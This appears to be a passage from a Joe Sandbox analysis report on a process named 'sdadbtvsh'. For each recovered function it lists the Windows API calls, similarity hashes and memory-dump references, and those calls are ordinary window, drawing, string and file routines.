Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 8d34d7c6337b2adeb763f4dddb40d1c00fd960667f4cbb75b9d54f6db641c918
Instruction ID: 83e755861f9bd09fe4631b52b29f3f4094c6949304dfaabf02bc880effff718f
Opcode Fuzzy Hash: 8d34d7c6337b2adeb763f4dddb40d1c00fd960667f4cbb75b9d54f6db641c918
Instruction Fuzzy Hash: 29512C74A00A19AFCF14DF54D9809AE7BB6FF45360F108559F8559B290D770AD81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00606033 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006060DD
GetLastError.KERNEL32(?,00000000), ref: 00606103
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00606128
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00606154

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: f024c21ca419a8f5b9bec445d3fd213273228379b283bfe96c148450c50863db
Instruction ID: 36efee09ebe78c9bed5601ef821ecbb8deefe9e131ac0236b9e5803dc6b85ab2
Opcode Fuzzy Hash: f024c21ca419a8f5b9bec445d3fd213273228379b283bfe96c148450c50863db
Instruction Fuzzy Hash: 03413C35200A11DFCF14EF14C559A5EBBE6FF89310B198088E84A9B3A2CB30FD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00622039 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0062204A

Part of subcall function 005F42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F42E6
Part of subcall function 005F42CC: GetCurrentThreadId.KERNEL32 ref: 005F42ED
Part of subcall function 005F42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F2E43), ref: 005F42F4

GetCaretPos.USER32(?), ref: 0062205E
ClientToScreen.USER32(00000000,?), ref: 006220AB
GetForegroundWindow.USER32 ref: 006220B1

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 2942ca8912bbcf359a04adabc6ca65c408988efb9caf2e14859d5bf0b6015f97
Instruction ID: a81a0adfe83cb94180099cb1b8c7a83eb9bd168b680317602078fc8912335940
Opcode Fuzzy Hash: 2942ca8912bbcf359a04adabc6ca65c408988efb9caf2e14859d5bf0b6015f97
Instruction Fuzzy Hash: 79313371D0010AAFCB14EFA5D8858EEBBF9FF89314B50846AE515E7211DA71DE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005FE7C1 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00594154: _wcslen.LIBCMT ref: 00594159

_wcslen.LIBCMT ref: 005FE7F7
_wcslen.LIBCMT ref: 005FE80E
_wcslen.LIBCMT ref: 005FE839
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 005FE844

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: e0bd10c0f35e12dac058beb5333f051050c4d555cdcd396817e3376e8dc5a3b7
Instruction ID: 1bc4f33190aca778bf072de3326c9200da2c121843b48a4c9fad571b34f2b365
Opcode Fuzzy Hash: e0bd10c0f35e12dac058beb5333f051050c4d555cdcd396817e3376e8dc5a3b7
Instruction Fuzzy Hash: D621D671D00215AFDB11AFA8C986BFEBFB8FF85750F104064E904AB291D6749E41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 006230E1 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00623169
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00623183
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00623191
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 0062319F

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: e41642483e7fbfc5764e136be69547955b6863f8cdcf1027055f9a83f2b93286
Instruction ID: 9ef8cb394449e9e9465630e74c6f73bd0051113ea8b15eb8a5d064aeeb500a8a
Opcode Fuzzy Hash: e41642483e7fbfc5764e136be69547955b6863f8cdcf1027055f9a83f2b93286
Instruction Fuzzy Hash: 2B217131204931AFE7159B14DC49FAA7BA6AF85324F248158F4668B3D2CB79ED42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005F8184 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 005F960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,005F8199,?,000000FF,?,005F8FE3,00000000,?,0000001C,?,?), ref: 005F961B
Part of subcall function 005F960C: lstrcpyW.KERNEL32(00000000,?), ref: 005F9641
Part of subcall function 005F960C: lstrcmpiW.KERNEL32(00000000,?,005F8199,?,000000FF,?,005F8FE3,00000000,?,0000001C,?,?), ref: 005F9672

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,005F8FE3,00000000,?,0000001C,?,?,00000000), ref: 005F81B2
lstrcpyW.KERNEL32(00000000,?), ref: 005F81D8
lstrcmpiW.KERNEL32(00000002,cdecl,?,005F8FE3,00000000,?,0000001C,?,?,00000000), ref: 005F8213

Strings

cdecl, xrefs: 005F820A

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 90e28e91035b198625c0c95f593bf81a5ef1364adb2feb457662128489b06d78
Instruction ID: 586d59fdc9be884f1013c6a73988163d1b16bca3a38b63b96378fcdb396eb1dc
Opcode Fuzzy Hash: 90e28e91035b198625c0c95f593bf81a5ef1364adb2feb457662128489b06d78
Instruction Fuzzy Hash: 3E110B3E200706ABCB145F38DC49E7A7BE5FF95350B50502AFA46C72A0EF35A812C790

Uniqueness

Uniqueness Score: -1.00%

Function 00628621 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 0062866A
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00628689
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006286A1
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0060C10A,00000000), ref: 006286CA

Part of subcall function 00592441: GetWindowLongW.USER32(00000000,000000EB), ref: 00592452

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 8c697c77a61aa7b519ec0c038cac6a93031519e1b4eab455447ae4c2af7d0bf1
Instruction ID: 4272caa4a5b81bac3db1a2a63c6e0790efd90da612924dbd37e76097603f92f1
Opcode Fuzzy Hash: 8c697c77a61aa7b519ec0c038cac6a93031519e1b4eab455447ae4c2af7d0bf1
Instruction Fuzzy Hash: 0B117231501A25AFCB109F29EC08AAA3BA6BB85370F254724F939D72E0DB309951CF50

Uniqueness

Uniqueness Score: -1.00%

Function 005C2099 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f4450a1820ece14fd1ad5c1e7334cb349dcdc6b44594e0411f7b5b4a0be776
Instruction ID: 18695ec5b75bb8744eaf7a36bdbe7a1758c6e43c161a47cdfbbf9203910e9963
Opcode Fuzzy Hash: d6f4450a1820ece14fd1ad5c1e7334cb349dcdc6b44594e0411f7b5b4a0be776
Instruction Fuzzy Hash: DE0184B22056167EE72125F86CC9F276B1DEF91374F35132DB521A11D1EA608C41C561

Uniqueness

Uniqueness Score: -1.00%

Function 005F22B7 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 005F22D7
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F22E9
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F22FF
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005F231A

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ba033179ba0091a6a7eb6eb109ad999178aa17033e4b188fe72c457a540d7914
Instruction ID: 99249608ba9c2e07d873f36e57afeb16ba9b8f57d9d723fc3e644fec5f11899a
Opcode Fuzzy Hash: ba033179ba0091a6a7eb6eb109ad999178aa17033e4b188fe72c457a540d7914
Instruction Fuzzy Hash: BA1109BA901219FFEF11DBA5CD85FADBBB8FB08750F200491EA00B7290D6756E11DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0062A852 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00592441: GetWindowLongW.USER32(00000000,000000EB), ref: 00592452

GetClientRect.USER32(?,?), ref: 0062A890
GetCursorPos.USER32(?), ref: 0062A89A
ScreenToClient.USER32(?,?), ref: 0062A8A5
DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 0062A8D9

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 841b1d1a0015575c5ee947ad55e37a2bc71209da02ea269b4a38b64b8bafce3c
Instruction ID: ca9c88532670e3d4023e0d37ef32ab46bd458501a253db35b62059f1427fba19
Opcode Fuzzy Hash: 841b1d1a0015575c5ee947ad55e37a2bc71209da02ea269b4a38b64b8bafce3c
Instruction Fuzzy Hash: A8114C7190092AEFDF14DF94E8459EE77BAFB05300F004555F911E7190D774AA82CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 005FEA02 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 005FEA29
MessageBoxW.USER32(?,?,?,?), ref: 005FEA5C
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005FEA72
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005FEA79

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: d39aa4889859fc5bbb5753235bf6e4f52758568eb93861041157162ce49621a0
Instruction ID: 58bace72bf7e2d1fe1a958261da3141bea62155d31347538e654f62cc6e7f497
Opcode Fuzzy Hash: d39aa4889859fc5bbb5753235bf6e4f52758568eb93861041157162ce49621a0
Instruction Fuzzy Hash: 8F110C75900659BFC7119B68DC0A99F7F6EBB45310F004215F925E3390D7B48D0587A1

Uniqueness

Uniqueness Score: -1.00%

Function 00628773 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00628792
ScreenToClient.USER32(?,?), ref: 006287AA
ScreenToClient.USER32(?,?), ref: 006287CE
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006287E9

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 95ca91aacdb0542b1bf710bc177b86d0772d231f0aa055140759eaedb6d5fdbf
Instruction ID: f1be3c7e7da1a5829f818c73aa0e967ca5fce3ac61f88aa496731d15d4df523c
Opcode Fuzzy Hash: 95ca91aacdb0542b1bf710bc177b86d0772d231f0aa055140759eaedb6d5fdbf
Instruction Fuzzy Hash: 331142B9D0060AEFDB51CFA8D884AEEBBF5FB08310F109166E915E3610D735AA55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006291C2 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00591ED9: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00591F33
Part of subcall function 00591ED9: SelectObject.GDI32(?,00000000), ref: 00591F42
Part of subcall function 00591ED9: BeginPath.GDI32(?), ref: 00591F59
Part of subcall function 00591ED9: SelectObject.GDI32(?,00000000), ref: 00591F82

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 006291E6
LineTo.GDI32(?,?,?), ref: 006291F3
EndPath.GDI32(?), ref: 00629203
StrokePath.GDI32(?), ref: 00629211

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: bda82666651c4345b0bd6e115441509cbd643bd999ffa649d8bccf2e1cf03138
Instruction ID: 03eca4bf922fcf6c309a78404f2d93051829550528e15604a5edc401baa92c88
Opcode Fuzzy Hash: bda82666651c4345b0bd6e115441509cbd643bd999ffa649d8bccf2e1cf03138
Instruction Fuzzy Hash: A4F05E31042A69BADB225F55AC0DFCE3F5BAF46310F048100FA11211E287B55622CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00592150 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0059216C
SetTextColor.GDI32(?,?), ref: 00592176
SetBkMode.GDI32(?,00000001), ref: 00592189
GetStockObject.GDI32(00000005), ref: 00592191

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 1dfb27107801cf0b8b5adc5f33138d2605a2b5778eb7303c13910504dcef119d
Instruction ID: cf1dfce201c745f456d10cd42542128a8fc39d2073f84d8063184e1cd9ea9b99
Opcode Fuzzy Hash: 1dfb27107801cf0b8b5adc5f33138d2605a2b5778eb7303c13910504dcef119d
Instruction Fuzzy Hash: DFE06531240640AEDB315F78AC0D7D87F21AB12335F148216F6BA541E0C3718651DB11

Uniqueness

Uniqueness Score: -1.00%

Function 005EEBD6 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 005EEBD6
GetDC.USER32(00000000), ref: 005EEBE0
GetDeviceCaps.GDI32(00000000,0000000C), ref: 005EEC00
ReleaseDC.USER32(?), ref: 005EEC21

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b129790731bd1ea8e07736f06d0e58213f5a27ef762ae5f9ab89f6098e33ed95
Instruction ID: 0e3df619d8caf391230e658faf23e1f57bd1c7d236b92693cade0612d1e82a9e
Opcode Fuzzy Hash: b129790731bd1ea8e07736f06d0e58213f5a27ef762ae5f9ab89f6098e33ed95
Instruction Fuzzy Hash: F0E01AB0800601DFCF60AFA0D80DA6DBFB6FB48310F108449E84AA3210CB384942DF14

Uniqueness

Uniqueness Score: -1.00%

Function 005EEBEA Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 005EEBEA
GetDC.USER32(00000000), ref: 005EEBF4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 005EEC00
ReleaseDC.USER32(?), ref: 005EEC21

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: aadd373d0496cf90ae4442e783708d00759a19dd820a6362f68e1f16b0be986b
Instruction ID: b17f8518c521ab79d20de6ed247afd09ae8f36bceb8f0c74e24919ef8a82a4b8
Opcode Fuzzy Hash: aadd373d0496cf90ae4442e783708d00759a19dd820a6362f68e1f16b0be986b
Instruction Fuzzy Hash: 02E092B5D00605EFCF61AFA0D80DA6DBBB6FB48711F159449E94AA3260CB389902DF14

Uniqueness

Uniqueness Score: -1.00%

Function 005BE60D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 005BE69D

Strings

pow, xrefs: 005BE675, 005BE692

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: fa764bf43df2f655d82c0780d0c86875ee6c1474d4654e1a76e019b0f6e52e03
Instruction ID: d8cfdfded679ab145256c2789c34cabae4258c37b919012d36738e7cebfeb68d
Opcode Fuzzy Hash: fa764bf43df2f655d82c0780d0c86875ee6c1474d4654e1a76e019b0f6e52e03
Instruction Fuzzy Hash: BB514771A085029EDB117B54ED07BFA2FE4FB50700F3C8D5DE091822A9EF349C96DA86

Uniqueness

Uniqueness Score: -1.00%

Function 005AA86C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 005AA896

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: dfd587649fb87b6f7ea38a3c41e26bf90464b3527a283307b4929a535d535608
Instruction ID: c863c43fcec53b9ff95f71408b7349da149f91a34f2fe518dd139748a28c8e30
